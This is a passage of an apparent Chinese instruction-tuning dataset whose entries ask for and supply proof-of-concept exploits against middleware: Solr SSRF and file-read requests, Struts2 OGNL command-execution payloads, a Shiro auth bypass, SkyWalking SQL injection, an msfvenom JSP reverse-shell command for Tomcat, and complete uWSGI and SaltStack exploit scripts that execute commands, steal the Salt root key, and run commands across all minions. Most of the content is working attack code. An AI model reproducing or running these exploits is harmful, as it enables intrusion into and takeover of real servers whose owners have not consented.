  165. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr Replication handler SSRF CVE-2021-27905\n漏洞描述:Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。 参考链接: * https://nvd.nist.gov/vuln/detail/CVE-2021-27905\n影响版本:``` Apache Solr 7.0.0 - 7.7.3 Apache Solr 8.0.0 - 8.8.1 ``` poc: ``` GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1 HOST:target .... ``` ``` GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1 HOST:target ... ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-27905\n【POC利用方法】\n1. Apache Solr 7.0.0 - 7.7.3 \nApache Solr 8.0.0 - 8.8.1\n2. GET /solr/test/replication?command=fetchindex&masterUrl=http://127.0.0.1/&wt=json&httpBasicAuthUser=&httpBasicAuthPassword= HTTP/1.1\nHOST:target\n....\n3. GET http://xxxxx/solr/xxxx/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1\nHOST:target\n...\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr Replication handler SSRF CVE-2021-27905.md"}
    166. 

  166. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-048 远程代码执行漏洞\n漏洞描述:漏洞详情: - http://struts.apache.org/docs/s2-048.html - http://bobao.360.cn/learning/detail/4078.html - [http://xxlegend.com/2017/07/08/S2-048%20%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90/](http://xxlegend.com/2017/07/08/S2-048 动态分析/)\n影响版本:影响版本: 2.0.0 - 2.3.32\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}\n3. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-048 远程代码执行漏洞.md"}
    167. 

  167. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Shiro 认证绕过漏洞 CVE-2020-1957\n漏洞描述:Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造`..;`这样的跳转,可以绕过Shiro中对目录的权限限制。 参考链接: - https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139 - https://xz.aliyun.com/t/8281 - https://blog.spoock.com/2020/05/09/cve-2020-1957/\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-1957\n【POC利用方法】\n1. docker-compose up -d\n2. @Bean\npublic ShiroFilterChainDefinition shiroFilterChainDefinition() {\n    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();\n    chainDefinition.addPathDefinition(\"/login.html\", \"authc\"); // need to accept POSTs from the login form\n    chainDefinition.addPathDefinition(\"/logout\", \"logout\");\n    chainDefinition.addPathDefinition(\"/admin/**\", \"authc\");\n    return chainDefinition;\n}\n3. GET /admin HTTP/1.1\nHost: your-vps-ip:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Shiro 认证绕过漏洞 CVE-2020-1957.md"}
    168. 

  168. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:uWSGI 未授权访问漏洞\n漏洞描述:uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,通常被用于运行Python WEB应用。uwsgi除了是应用容器的名称之外,它和Fastcgi之类的一样,也是前端server与后端应用容器之间的一个交流标准。目前nginx,apache也支持uwsgi协议进行代理转发请求。 uWSGI支持通过魔术变量(Magic Variables)的方式动态配置后端Web应用。如果其端口暴露在外,攻击者可以构造uwsgi数据包,并指定魔术变量`UWSGI_FILE`,运用`exec://`协议执行任意命令。 参考链接: - https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi-rce-zh.md - https://xz.aliyun.com/t/3512 - https://uwsgi-docs.readthedocs.io/en/latest/Vars.html\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. #!/usr/bin/python\n# coding: utf-8\n######################\n# Uwsgi RCE Exploit\n######################\n# Author: wofeiwo@80sec.com\n# Created: 2017-7-18\n# Last modified: 2018-1-30\n# Note: Just for research purpose\n\nimport sys\nimport socket\nimport argparse\nimport requests\n\ndef sz(x):\n    s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')\n    s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')\n    return s[::-1]\n\n\ndef pack_uwsgi_vars(var):\n    pk = b''\n    for k, v in var.items() if hasattr(var, 'items') else var:\n        pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')\n    result = b'\\x00' + sz(pk) + b'\\x00' + pk\n    return result\n\n\ndef parse_addr(addr, default_port=None):\n    port = default_port\n    if isinstance(addr, str):\n        if addr.isdigit():\n            addr, port = '', addr\n        elif ':' in addr:\n            addr, _, port = addr.partition(':')\n    elif isinstance(addr, (list, tuple, set)):\n        addr, port = addr\n    port = int(port) if port else port\n    return (addr or '127.0.0.1', port)\n\n\ndef get_host_from_url(url):\n    if '//' in url:\n        url = url.split('//', 1)[1]\n    host, _, url = url.partition('/')\n    return (host, '/' + url)\n\n\ndef fetch_data(uri, payload=None, body=None):\n    if 'http' not in uri:\n        uri = 'http://' + uri\n    s = requests.Session()\n    # s.headers['UWSGI_FILE'] = payload\n    if body:\n        import urlparse\n        body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))\n        d = s.post(uri, data=body_d)\n    else:\n        d = s.get(uri)\n\n    return {\n        'code': d.status_code,\n        'text': d.text,\n        'header': d.headers\n    }\n\n\ndef ask_uwsgi(addr_and_port, mode, var, body=''):\n    if mode == 'tcp':\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.connect(parse_addr(addr_and_port))\n    elif mode == 'unix':\n        s = socket.socket(socket.AF_UNIX)\n        s.connect(addr_and_port)\n    s.send(pack_uwsgi_vars(var) + body.encode('utf8'))\n    response = []\n    # Actually we dont need the response, it will block if we run any commands.\n    # So I comment all the receiving stuff. \n    # while 1:\n    #     data = s.recv(4096)\n    #     if not data:\n    #         break\n    #     response.append(data)\n    s.close()\n    return b''.join(response).decode('utf8')\n\n\ndef curl(mode, addr_and_port, payload, target_url):\n    host, uri = get_host_from_url(target_url)\n    path, _, qs = uri.partition('?')\n    if mode == 'http':\n        return fetch_data(addr_and_port+uri, payload)\n    elif mode == 'tcp':\n        host = host or parse_addr(addr_and_port)[0]\n    else:\n        host = addr_and_port\n    var = {\n        'SERVER_PROTOCOL': 'HTTP/1.1',\n        'REQUEST_METHOD': 'GET',\n        'PATH_INFO': path,\n        'REQUEST_URI': uri,\n        'QUERY_STRING': qs,\n        'SERVER_NAME': host,\n        'HTTP_HOST': host,\n        'UWSGI_FILE': payload,\n        'SCRIPT_NAME': target_url\n    }\n    return ask_uwsgi(addr_and_port, mode, var)\n\n\ndef main(*args):\n    desc = \"\"\"\n    This is a uwsgi client & RCE exploit.\n    Last modifid at 2018-01-30 by wofeiwo@80sec.com\n    \"\"\"\n    elog = \"Example:uwsgi_exp.py -u 1.2.3.4:5000 -c \\\"echo 111>/tmp/abc\\\"\"\n    \n    parser = argparse.ArgumentParser(description=desc, epilog=elog)\n\n    parser.add_argument('-m', '--mode', nargs='?', default='tcp',\n                        help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',\n                        dest='mode', choices=['http', 'tcp', 'unix'])\n\n    parser.add_argument('-u', '--uwsgi', nargs='?', required=True,\n                        help='Uwsgi server: 1.2.3.4:5000 or /tmp/uwsgi.sock',\n                        dest='uwsgi_addr')\n\n    parser.add_argument('-c', '--command', nargs='?', required=True,\n                        help='Command: The exploit command you want to execute, must have this.',\n                        dest='command')\n\n    if len(sys.argv) < 2:\n        parser.print_help()\n        return\n    args = parser.parse_args()\n    if args.mode.lower() == \"http\":\n        print(\"[-]Currently only tcp/unix method is supported in RCE exploit.\")\n        return\n    payload = 'exec://' + args.command + \"; echo test\" # must have someting in output or the uWSGI crashs.\n    print(\"[*]Sending payload.\")\n    print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))\n\nif __name__ == '__main__':\n    main()\n3. print(\"[-]Currently only tcp/unix method is supported in RCE exploit.\")\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/uWSGI 未授权访问漏洞.md"}
    169. 

  169. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-012 远程代码执行漏洞\n漏洞描述:如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: ``` <package name=\"S2-012\" extends=\"struts-default\"> <action name=\"user\" class=\"com.demo.action.UserAction\"> <result name=\"redirect\" type=\"redirect\">/index.jsp?name=${name}</result> <result name=\"input\">/index.jsp</result> <result name=\"success\">/index.jsp</result> </action> </package> ``` 这里 UserAction 中定义有一个 name 变量,当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。 漏洞详情: - http://struts.apache.org/docs/s2-012.html\n影响版本:影响版本: 2.1.0 - 2.3.13\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. <package name=\"S2-012\" extends=\"struts-default\">\n    <action name=\"user\" class=\"com.demo.action.UserAction\">\n        <result name=\"redirect\" type=\"redirect\">/index.jsp?name=${name}</result>\n        <result name=\"input\">/index.jsp</result>\n        <result name=\"success\">/index.jsp</result>\n    </action>\n</package>\n2. docker-compose build\ndocker-compose up -d\n3. %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\"cat\", \"/etc/passwd\"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-012 远程代码执行漏洞.md"}
    170. 

  170. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache SkyWalking 7.0.0 graphql SQL注入漏洞 CVE-2020-9483\n漏洞描述:腾讯安全威胁情报中心监测到Apache SkyWalking发布更新,修复了一个SQL注入漏洞(编号:CVE-2020-9483)。远程攻击者可通过Apache SkyWalking默认开放的未授权GraphQL接口构造恶意请求包进行注入攻击,成功利用此漏洞可造成敏感数据泄漏。该漏洞等级为高危,腾讯安全专家建议相关企业尽快修复。\n影响版本:``` Apache SkyWalking 6.0.0~6.6.0 Apache SkyWalking 7.0.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-9483\n【POC利用方法】\n1. Apache SkyWalking 6.0.0~6.6.0\nApache SkyWalking 7.0.0\n2. for i in \"$OAP_HOME\"/oap-libs/*.jar\ndo\n    CLASSPATH=\"$i:$CLASSPATH\"\ndone\n\nOAP_OPTIONS=\" -Doap.logDir=${OAP_LOG_DIR}\"\n\neval exec \"\\\"$_RUNJAVA\\\" ${JAVA_OPTS} ${OAP_OPTIONS} -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -classpath $CLASSPATH org.apache.skywalking.oap.server.starter.OAPServerStartUp \\\n        2>${OAP_LOG_DIR}/oap.log 1> /dev/null &\"\n\nif [ $? -eq 0 ]; then\n    sleep 1\n\techo \"SkyWalking OAP started successfully!\"\nelse\n\techo \"SkyWalking OAP started failure!\"\n\texit 1\n3. POST /graphql HTTP/1.1\nHost:\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCache-Control: max-age=0\nContent-Type: application/json\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\nContent-Length: 416\n\n{\n    \"query\": \"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \\\"all_p99\\\", id: \\\"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\\\" }, duration: $duration) {  values { value } }}\",\n    \"variables\": {\n        \"duration\": {\n            \"end\": \"2020-08-07 1418\",\n            \"start\": \"2020-08-07 1417\",\n            \"step\": \"MINUTE\"\n        }\n    }\n}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache SkyWalking 7.0.0 graphql SQL注入漏洞 CVE-2020-9483.md"}
    171. 

  171. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat 远程代码执行漏洞 CVE-2017-12615\n漏洞描述:2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。\n影响版本:``` Apache Tomcat 7.0.0 - 7.0.81 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-12615\n【POC利用方法】\n1. Apache Tomcat 7.0.0 - 7.0.81\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/tomcat/CVE-2017-12615\ndocker-compose up -d\n3. msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=9999 -f raw > shell.jsp\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Tomcat 远程代码执行漏洞 CVE-2017-12615.md"}
    172. 

  172. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381\n漏洞描述:PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取,获取敏感信息\n影响版本:``` Payara Micro Community 5.2021.6 ```\n网络测绘:``` app=\"Payara-Micro\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-41381\n【POC利用方法】\n1. Payara Micro Community 5.2021.6\n2. app=\"Payara-Micro\"\n3. /.//WEB-INF/classes/META-INF/microprofile-config.properties\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381.md"}
    173. 

  173. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nginx 解析漏洞\n漏洞描述:Nginx解析漏洞复现。 版本信息: - Nginx 1.x 最新版 - PHP 7.x最新版 由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. copy 1.jpg/b+1.php/a 2.jpg\n2. 访问`http://your-ip/uploadfiles/fb5c81ed3a220004b71069645f112867.png/.php`即可触发解析漏洞。\n3. 访问`http://your-ip/uploadfiles/nginx.png`和`http://your-ip/uploadfiles/nginx.png/.php`即可查看效果。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Nginx 解析漏洞.md"}
    174. 

  174. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SaltStack 任意文件读写漏洞 CVE-2020-11652\n漏洞描述:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11652 目录遍历漏洞中,攻击者通过构造恶意请求,可以读取、写入服务器上任意文件。 参考链接: - https://labs.f-secure.com/advisories/saltstack-authorization-bypass - https://github.com/rossengeorgiev/salt-security-backports - https://github.com/jasperla/CVE-2020-11651-poc\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-11652\n【POC利用方法】\n1. docker-compose up -d\n2. msg = {\n    'key': root_key,\n    'cmd': 'wheel',\n    'fun': 'file_roots.write',\n    'path': '../../path/to/target',\n    'data': 'test'\n#    'saltenv': 'base',\n  }\n3. #!/usr/bin/env python\n#\n# Exploit for CVE-2020-11651 and CVE-2020-11652\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\n# This exploit is based on this checker script:\n# https://github.com/rossengeorgiev/salt-security-backports\n\nfrom __future__ import absolute_import, print_function, unicode_literals\nimport argparse\nimport datetime\nimport os\nimport os.path\nimport sys\nimport time\n\nimport salt\nimport salt.version\nimport salt.transport.client\nimport salt.exceptions\n\ndef init_minion(master_ip, master_port):\n    minion_config = {\n        'transport': 'zeromq',\n        'pki_dir': '/tmp',\n        'id': 'root',\n        'log_level': 'debug',\n        'master_ip': master_ip,\n        'master_port': master_port,\n        'auth_timeout': 5,\n        'auth_tries': 1,\n        'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)\n    }\n\n    return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')\n\n# --- check funcs ----\n\ndef check_connection(master_ip, master_port, channel):\n  print(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='')\n  sys.stdout.flush()\n\n  # connection check\n  try:\n    channel.send({'cmd':'ping'}, timeout=2)\n  except salt.exceptions.SaltReqTimeoutError:\n    print(\"OFFLINE\")\n    sys.exit(1)\n  else:\n    print(\"ONLINE\")\n\ndef check_CVE_2020_11651(channel):\n  print(\"[+] Checking if vulnerable to CVE-2020-11651... \", end='')\n  sys.stdout.flush()\n\n  try:\n    rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)\n  except:\n    print('ERROR')\n    return None\n  else:\n    pass\n  finally:\n    if rets:\n      print('YES')\n      root_key = rets[2]['root']\n      return root_key\n\n  print('NO')\n  return None\n\ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):\n  print(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='')\n  sys.stdout.flush()\n\n  # try read file\n  msg = {\n    'cmd': 'get_token',\n    'arg': [],\n    'token': top_secret_file_path,\n  }\n\n  try:\n    rets = channel.send(msg, timeout=3)\n  except salt.exceptions.SaltReqTimeoutError:\n    print(\"YES\")\n  except:\n    print(\"ERROR\")\n    raise\n  else:\n    if debug:\n      print()\n      print(rets)\n    print(\"NO\")\n  \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):\n  print(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='')\n  sys.stdout.flush()\n\n  # try read file\n  msg = {\n    'key': root_key,\n    'cmd': 'wheel',\n    'fun': 'file_roots.read',\n    'path': top_secret_file_path,\n    'saltenv': 'base',\n  }\n\n  try:\n    rets = channel.send(msg, timeout=3)\n  except salt.exceptions.SaltReqTimeoutError:\n    print(\"TIMEOUT\")\n  except:\n    print(\"ERROR\")\n    raise\n  else:\n    if debug:\n      print()\n      print(rets)\n    if rets['data']['return']:\n      print(\"YES\")\n    else:\n      print(\"NO\")\n\ndef check_CVE_2020_11652_write1(debug, channel, root_key):\n  print(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... \", end='')\n  sys.stdout.flush()\n\n  # try read file\n  msg = {\n    'key': root_key,\n    'cmd': 'wheel',\n    'fun': 'file_roots.write',\n    'path': '../../../../../../../../tmp/salt_CVE_2020_11652',\n    'data': 'evil',\n    'saltenv': 'base',\n  }\n\n  try:\n    rets = channel.send(msg, timeout=3)\n  except salt.exceptions.SaltReqTimeoutError:\n    print(\"TIMEOUT\")\n  except:\n    print(\"ERROR\")\n    raise\n  else:\n    if debug:\n      print()\n      print(rets)\n\n    pp(rets)\n    if rets['data']['return'].startswith('Wrote'):\n      try:\n        os.remove('/tmp/salt_CVE_2020_11652')\n      except OSError:\n        print(\"Maybe?\")\n      else:\n        print(\"YES\")\n    else:\n      print(\"NO\")\n\ndef check_CVE_2020_11652_write2(debug, channel, root_key):\n  print(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='')\n  sys.stdout.flush()\n\n  # try read file\n  msg = {\n    'key': root_key,\n    'cmd': 'wheel',\n    'fun': 'config.update_config',\n    'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',\n    'yaml_contents': 'evil',\n    'saltenv': 'base',\n  }\n\n  try:\n    rets = channel.send(msg, timeout=3)\n  except salt.exceptions.SaltReqTimeoutError:\n    print(\"TIMEOUT\")\n  except:\n    print(\"ERROR\")\n    raise\n  else:\n    if debug:\n      print()\n      print(rets)\n    if rets['data']['return'].startswith('Wrote'):\n      try:\n        os.remove('/tmp/salt_CVE_2020_11652.conf')\n      except OSError:\n        print(\"Maybe?\")\n      else:\n        print(\"YES\")\n    else:\n      print(\"NO\")\n\ndef pwn_read_file(channel, root_key, path, master_ip):\n    print(\"[+] Attemping to read {} from {}\".format(path, master_ip))\n    sys.stdout.flush()\n\n    msg = {\n        'key': root_key,\n        'cmd': 'wheel',\n        'fun': 'file_roots.read',\n        'path': path,\n        'saltenv': 'base',\n    }\n\n    rets = channel.send(msg, timeout=3)\n    print(rets['data']['return'][0][path])\n\ndef pwn_upload_file(channel, root_key, src, dest, master_ip):\n    print(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip))\n    sys.stdout.flush()\n\n    try:\n        fh = open(src, 'rb')\n        payload = fh.read()\n        fh.close()\n    except Exception as e:\n        print('[-] Failed to read {}: {}'.format(src, e))\n        return\n\n    msg = {\n        'key': root_key,\n        'cmd': 'wheel',\n        'fun': 'file_roots.write',\n        'saltenv': 'base',\n        'data': payload,\n        'path': dest,\n    }\n\n    rets = channel.send(msg, timeout=3)\n    print('[ ] {}'.format(rets['data']['return']))\n\ndef pwn_exec(channel, root_key, cmd, master_ip, jid):\n    print(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip))\n    sys.stdout.flush()\n\n    msg = {\n        'key': root_key,\n        'cmd': 'runner',\n        'fun': 'salt.cmd',\n        'saltenv': 'base',\n        'user': 'sudo_user',\n        'kwarg': {\n            'fun': 'cmd.exec_code',\n            'lang': 'python',\n            'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd)\n        },\n        'jid': jid,\n    }\n\n    try:\n        rets = channel.send(msg, timeout=3)\n    except Exception as e:\n        print('[-] Failed to submit job')\n        return\n\n    if rets.get('jid'):\n        print('[+] Successfully scheduled job: {}'.format(rets['jid']))\n\ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid):\n    print(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip))\n    sys.stdout.flush()\n\n    msg = {\n        'key': root_key,\n        'cmd': '_send_pub',\n        'fun': 'cmd.run',\n        'user': 'root',\n        'arg': [ \"/bin/sh -c '{}'\".format(cmd) ],\n        'tgt': '*',\n        'tgt_type': 'glob',\n        'ret': '',\n        'jid': jid\n    }\n\n    try:\n        rets = channel.send(msg, timeout=3)\n    except Exception as e:\n        print('[-] Failed to submit job')\n        return\n    finally:\n        if rets == None:\n            print('[+] Successfully submitted job to all minions.')\n        else:\n            print('[-] Failed to submit job')\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')\n    parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')\n    parser.add_argument('--port', '-p', dest='master_port', default='4506')\n    parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')\n    parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')\n    parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')\n    parser.add_argument('--read', '-r', dest='read_file')\n    parser.add_argument('--upload-src', dest='upload_src')\n    parser.add_argument('--upload-dest', dest='upload_dest')\n    parser.add_argument('--exec', dest='exec', help='Run a command on the master')\n    parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')\n    args = parser.parse_args()\n\n    print(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\")\n    time.sleep(1)\n\n    # Both src and destination are required for uploads\n    if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):\n        print('[-] Must provide both --upload-src and --upload-dest')\n        sys.exit(1)\n\n    channel = init_minion(args.master_ip, args.master_port)\n\n    check_connection(args.master_ip, args.master_port, channel)\n    \n    root_key = check_CVE_2020_11651(channel)\n    if root_key:\n        print('[*] root key obtained: {}'.format(root_key))\n    else:\n        print('[-] Failed to find root key...aborting')\n        sys.exit(127)\n\n    if args.run_checks:\n        # Assuming this check runs on the master itself, create a file with \"secret\" content\n        # and abuse CVE-2020-11652 to read it.\n        top_secret_file_path = '/tmp/salt_cve_teta'\n        with salt.utils.fopen(top_secret_file_path, 'w') as fd:\n            fd.write(\"top secret\")\n\n        # Again, this assumes we're running this check on the master itself\n        with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:\n            root_key = keyfd.read()\n\n        check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)\n        check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)\n        check_CVE_2020_11652_write1(debug, channel, root_key)\n        check_CVE_2020_11652_write2(debug, channel, root_key)\n        os.remove(top_secret_file_path)\n        sys.exit(0)\n\n    if args.read_file:\n        pwn_read_file(channel, root_key, args.read_file, args.master_ip)\n\n    if args.upload_src:\n        if os.path.isabs(args.upload_dest):\n            print('[-] Destination path must be relative; aborting')\n            sys.exit(1)\n        pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)\n\n\n    jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())\n\n    if args.exec:\n        pwn_exec(channel, root_key, args.exec, args.master_ip, jid)\n\n    if args.exec_all:\n        print(\"[!] Lester, is this what you want? Hit ^C to abort.\")\n        time.sleep(2)\n        pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)\n\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/SaltStack 任意文件读写漏洞 CVE-2020-11652.md"}
    175. 

